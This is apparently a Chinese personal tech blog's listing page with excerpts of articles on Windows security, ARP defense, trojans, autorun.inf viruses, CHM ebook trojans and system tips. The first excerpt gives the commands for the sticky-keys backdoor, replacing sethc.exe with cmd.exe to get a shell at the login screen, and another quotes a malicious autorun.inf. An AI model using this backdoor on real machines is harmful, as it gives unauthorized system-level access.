夜火博客 个人的碎碎念收集箱

2000/xp/vista下5次shift的粘滞键利用

      这篇文章里说的方法和欠钱前2天说的用explorer.exe替换sethc.exe然后在3389下用5次shift获得资源管理器的方法差不多,不过做了一些扩展,蛮有意思~

  在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

  XP:

将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%system32dllcache
ren sethc.exe *.ex~
cd %widnir%system32
copy /y cmd.exe sethc.exe

  VISTA:

takeown /f c:windowssystem32sethc.exe
cacls c:windowssystem32sethc.exe /G administrator:F
然后按XP方法替换文件

用批处理文件抵御ARP攻击

  ARP欺骗通过伪造IP地址和MAC地址实现,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 笔者将介绍四种利用自制批处理文件来防御ARP攻击的方法。  一、把下面语句编成BAT处理文件      @echo off 。。。。。。。。。。。。。。。

常见木马防范宝典

 奇虎360安全中心最近发布的《互联网不安全报告》中披露,2007年上半年奇虎共截获病毒、恶意软件及木马程序共计168135个,其中木马程序占据了80%的比例。比如著名的“灰鸽子”木马,仅不完全统计就有大概6万个变种。 可见在现今阶段的互联网,木马的危害已经占据了主导。   谈“马”色变并不是空穴来风,你可能觉得自己已经安装了最新版本的杀毒软件和防火墙,自认铜墙铁壁、百毒不侵。可要命的变种木马程序让病毒库防不胜防。毕竟是先有病毒,再有病毒库更新。目前各大杀毒公司纷纷进入主动杀毒/防御领域,正是因为大家已经意识到面对最新木马病毒的查杀,时间是最关键的因素!   那现阶段呢?我们这些饱受侵害的用户该做些什么呢?其实木马发展到现在,最重要的因素就是其很好的利用了社会工程学原理,在伪装和侵入方式上下足了功夫。这对于木马的整个入侵程序来说最为重要——换句话说:你需要运行木马,才能让自己的计算机中招!今天就针对这一环节,分析当前木马惯用伎俩,不用杀毒软件也能分辨出木马程序。

标签: 安全技术类

作者:夜火 分类:技术文章 浏览:1988 评论:0

什么是VPS虚拟服务器?

有些人乍听到VPS这个词会有些糊涂,其实VPS的全称是叫Virtual Private Server,中文翻译为虚拟专用服务器,在这里,我提供一些资料供大家参考。1.VPS主机的概念VPS是利用VPS(Virtual Private Server)技术,在一台服务器上创建多个相互隔离的虚拟专用服务器的优质服务。每个VPS的运行和管理都与一台独立主机完全相同,都可分配独立公网IP地址、独立操作系统Windows/Linux、独立超大空间、独立内存、独立CPU资源、独立执行程序和独立系统配置等。用户除了可以分配多个虚拟主机及无限企业邮箱外,更具有独立服务器功能,可自行安装程序,单独重启服务器,总而言之,VPS是一项具备高弹性、高质量及低成本效益的服务器解决方案。

Windows

  对于用惯了鼠标的朋友来说,Windows系统里的“运行”命令恐怕算得上是“老古董”了,但是有些时候,使用它却可以让繁琐的操作变得轻松自如,下面就让我来告诉你如何利用“运行”命令的七种武器来纵横于Windows江湖吧!  首先我们通过单击“开始→运行”命令,打开“运行”对话框,逐一输入以下命令:  1. Winmsd--初涉江湖“孔雀翎”:该命令可以打开“系统信息”窗口,供用户查看Windows系统的硬件资源、组件和软件资源等信息,让你将系统一览无余。.....................

打造永不中毒的IE

  在浏览器界,微软以其操作系统得天独厚的优势,让IE稳稳的坐上头把交椅。也同样是因为使用者众多,漏洞频频,让很多用户感觉IE不甚安全,稳定性很差。有这么糟糕么?如果你正在用IE6的话,新建一个文本,输入引号中的内容“[code]

[/code]”,保存成一个html文件,用IE打开它,竟然出现错误关闭窗口。这不过是个小把戏,因为它并没给你造成什么实质性的伤害。  反过来,客观的说.......

标签: 安全技术类

作者:夜火 分类:技术文章 浏览:1811 评论:0

病毒的Autorun.inf新写法与应用以及防御

首先是autorun.inf一般的病毒的Autorun.inf文件内容为[autorun]open=.RECYCLERRECYCLERautorun.exe shell1=Openshell1Command=.RECYCLERRECYCLERautorun.exeshell2=Browsershell2Command=.RECYCLERRECYCLERautorun.exeshellexecute=.RECYCLERRECYCLERautorun.exe........................

Windows XP安全模板,你知道吗?

  Windows  XP操作系统提供了强大的安全机制,但是如果要一一设置这些安全配置,却是非常费时、费力的事,那么有没有一种可以快速配置安全选项的办法呢?答案是肯定的,用安全模板就能快速、批量地设定所有安全选项。

  一、了解安全模板

  "安全模板"是一种可以定义安全策略的文件表示方式,它能够配置账户和本地策略、事件日志、受限组、文件系统、注册表以及系统服务等项目的安全设置。安全模板都以.inf格式的文本文件存在,用户可以方便地复制、粘贴、导入或导出某些模板。此外,安全模板并不引入新的安全参数,而只是将所有现有的安全属性组织到一个位置以简化安全性管理,并且提供了一种快速批量修改安全选项的方法。

死顽固病毒?——用系统控制台删除

  一台操作系统为Win2000 Server的笔记本电脑最近被感染了病毒,我首先用相关杀毒软件来扫描计算机,扫描报告如下:  病毒名称:Hacktool  文件名:c:winntsystem32 tservice.exe  操作:删除失败,隔离失败,访问被拒绝  如何才能彻底 删除呢?.......

电子书木马及防范方法

  电子书木马(以下所指的电子书均指CHM格式的电子书)?其实这种方式的木马传播方法很早就有出现,但好象是多以网页木马的形式存在的,也就是把所谓的一个网页木马加入电子书里,这种效果和一般的网页木马的效果一样受到漏洞范围的限制,因此一直没引起人们的太大关注,也许大家觉得这样还不如直接的网页木马来得方便,其实不然,因为电子书相对与网页而言有许多“优点”,当然这里所谓的“优点”是指在传播木马方面而言的!   在正式打造我们的电子书木马前,我们先分析一下它的“优点”吧!......

windows蓝屏代码数值概述

0 0x0000作业完成。 1 0x0001不正确的函数。 2 0x0002系统找不到指定的档案。 3 0x0003系统找不到指定的路径。 4 0x0004系统无法开启档案。 5 0x0005拒绝存取。 6 0x0006无效的代码。 ..............................

标签: 技术类Windows

作者:夜火 分类:技术文章 浏览:2234 评论:0

修复无法显示隐藏文件的几种方法

     现在有很多的病毒可以让你无法显示隐藏文件,遇到这种情况,你可以试试以下几种方法。  一、将下面的内容复制到记事本,保存为reg的注册表信息文件,然后双击导入。    注意:修改前务必备份注册表项。    Windows Registry Editor Version 5.00  [HKEY_LOCAL_MACHINESOFTWAR........